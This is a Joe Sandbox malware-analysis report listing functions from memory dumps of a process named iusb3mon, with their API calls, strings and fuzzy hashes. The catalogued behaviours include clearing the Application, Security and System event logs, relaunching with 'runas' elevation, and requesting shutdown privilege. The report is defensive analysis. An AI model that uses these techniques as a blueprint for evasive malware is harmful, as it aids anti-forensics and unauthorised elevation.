Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 783efcd67566c0908cb70509022272c8aa07aac434e0b9ba21d859810a52c493
Instruction ID: 158ced1d4d9e45f7565c95ac117ea05cde1786acdda4413cfeb83b0115a691c0
Opcode Fuzzy Hash: 783efcd67566c0908cb70509022272c8aa07aac434e0b9ba21d859810a52c493
Instruction Fuzzy Hash: E401B170D25A0EAFCF90DF5898587EC7BB0EB80395F408099ED01FA280E6744A01CFB0

Function 0035A342 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0035A660,?,00000000), ref: 0035A3DB
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0035A660,?,00000000), ref: 0035A404
GetACP.KERNEL32(?,?,0035A660,?,00000000), ref: 0035A419

Strings

OCP, xrefs: 0035A396
ACP, xrefs: 0035A360

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 868b7ba43273bfdd8012b430ba3951e2aac3b7c5ffb717e4f446fa6306d1b89a
Instruction ID: f038c7b5db03fbdbddf2ee5a1cc8544e2f13c04e95da359057595896c5c8bdc8
Opcode Fuzzy Hash: 868b7ba43273bfdd8012b430ba3951e2aac3b7c5ffb717e4f446fa6306d1b89a
Instruction Fuzzy Hash: E221F76570090096DB378F56C904E9773AAAF54B5AB178634ED0AC7230F732DE49E352

Function 06294652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 06294681

Part of subcall function 0629461E: GetVersionExA.KERNEL32(?), ref: 06294638

ShellExecuteExA.SHELL32(0000003C), ref: 062946F2
ExitProcess.KERNEL32 ref: 062946FE

Strings

runas, xrefs: 062946DD
<, xrefs: 062946CD

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecuteExitFileModuleNameProcessShellVersion
String ID: <$runas
API String ID: 984616556-1187129395
Opcode ID: cbcd2f452d46179bed7c27c241c8a9d34e23e5b283cd02eec2870cb0c42c0291
Instruction ID: 17a5e6fcacb7087757099e0eaaca3cb3b57bcfc1c93eca2fd0b21acf3f2efa50
Opcode Fuzzy Hash: cbcd2f452d46179bed7c27c241c8a9d34e23e5b283cd02eec2870cb0c42c0291
Instruction Fuzzy Hash: 93114272D14259ABEF64EFA4EC09BC97BB5BB48300F0044A6E708B6190DBB49649CF15

Function 062972F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0629732E
wsprintfA.USER32 ref: 06297343

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 06297318
~MHz, xrefs: 06297313
%d*%sMHz, xrefs: 0629733B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeInfoLoadSystemwsprintf
String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 3469679427-2169120903
Opcode ID: 39e57317198c0af2743801194f917676218785b1b822a13092f503dd98f6bdbf
Instruction ID: 57b26d072ef2cf14da5883069dd1ca492c07deb6c03e6131a55edeea188c5c1f
Opcode Fuzzy Hash: 39e57317198c0af2743801194f917676218785b1b822a13092f503dd98f6bdbf
Instruction Fuzzy Hash: 5FF08972D10208BFEB44EBE4DC4ADEEB77DDB04650F004955FF21F1051E67496158B65

Function 0035A517 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00350B40: GetLastError.KERNEL32(?,00000008,003549F0), ref: 00350B44
Part of subcall function 00350B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00350BE6

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0035A623
IsValidCodePage.KERNEL32(00000000), ref: 0035A66C
IsValidLocale.KERNEL32(?,00000001), ref: 0035A67B
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0035A6C3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0035A6E2

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: c5ad2fb80be08358726181801be84683a361918e1a889852f2f8efa1b3c83680
Instruction ID: 4c701701c5eea28d22be6f40f4079b3ca330ba9b9535efbed48e82beb590c5e7
Opcode Fuzzy Hash: c5ad2fb80be08358726181801be84683a361918e1a889852f2f8efa1b3c83680
Instruction Fuzzy Hash: 515183719006099FDB12DFA5CC41EBE77B8BF08702F194565ED41EB1A0E770DA489B62

Function 00359BB3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00350B40: GetLastError.KERNEL32(?,00000008,003549F0), ref: 00350B44
Part of subcall function 00350B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00350BE6

GetACP.KERNEL32(?,?,?,?,?,?,0034E45B,?,?,?,?,?,-00000050,?,?,?), ref: 00359C74
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0034E45B,?,?,?,?,?,-00000050,?,?), ref: 00359C9F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00359E02

Strings

utf8, xrefs: 00359D71

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 51e8e321454f7d5e6c8ed0dbb725bcbb5cce63a758fe0b96a83352bee9e16686
Instruction ID: e91f8b275611cbdcd407d887220b2109f73ffd87c84122fcb973f16d59b06bc0
Opcode Fuzzy Hash: 51e8e321454f7d5e6c8ed0dbb725bcbb5cce63a758fe0b96a83352bee9e16686
Instruction Fuzzy Hash: A571D471600301EADB2BAB75CC42FA673FCEF45702F15446AFD05DB1A1FA75E9488660

Function 062AABEF Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 062AB4CB: GetWindowLongA.USER32(?,000000F0), ref: 062AB4D7

GetKeyState.USER32(00000010), ref: 062AAC13
GetKeyState.USER32(00000011), ref: 062AAC1C
GetKeyState.USER32(00000012), ref: 062AAC25
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 062AAC3B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: b3d538a7d349cb0e2ed51acb2211ede9b8f8968c58e21c07d0f5fbe75050c2de
Instruction ID: e7e0c3a248d4a2b3492d48d19f63b0f1959c5592ba98905cd444f9ca5470394b
Opcode Fuzzy Hash: b3d538a7d349cb0e2ed51acb2211ede9b8f8968c58e21c07d0f5fbe75050c2de
Instruction Fuzzy Hash: 4EF0A0B6B6034A67FAB83A642C89FE9911B4F41BE1F018422EF51AE0D489D18842DA74

Function 00346340 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00346460,0035F12C), ref: 00346345
UnhandledExceptionFilter.KERNEL32(?,?,00346460,0035F12C), ref: 0034634E
GetCurrentProcess.KERNEL32(C0000409,?,00346460,0035F12C), ref: 00346359
TerminateProcess.KERNEL32(00000000,?,00346460,0035F12C), ref: 00346360

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e23afb219edaf50e4a2b9cfe03a4ae1af25c693f4e6f1032d4e44cae2f3e94ec
Instruction ID: 83be7662e380d52446b8fc51197022ed0374877c64733fa71d3ba8b826750001
Opcode Fuzzy Hash: e23afb219edaf50e4a2b9cfe03a4ae1af25c693f4e6f1032d4e44cae2f3e94ec
Instruction Fuzzy Hash: 3FD0CA32000308ABDA8A2BE2ED0CA4D3A2EBB0831BF044400F30A830F1DAB146008B63

Function 062A3F29 Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4412f443d35af6a1c109c3a31ab9ec1031315958ac8bece66da163f6d97ecab5
Instruction ID: e48d24591835b56456b5b9f70092279fbd1b23d50b1e8ec311a51839be0266da
Opcode Fuzzy Hash: 4412f443d35af6a1c109c3a31ab9ec1031315958ac8bece66da163f6d97ecab5
Instruction Fuzzy Hash: CCF0193193430AAFDB81DFA1DC08AAA7BBAAB04340B048429FD56D5060DBF4C611DB91

Function 062939EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 06298FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062939FA,SeShutdownPrivilege,00000001,?,0629200F,?), ref: 0629900F
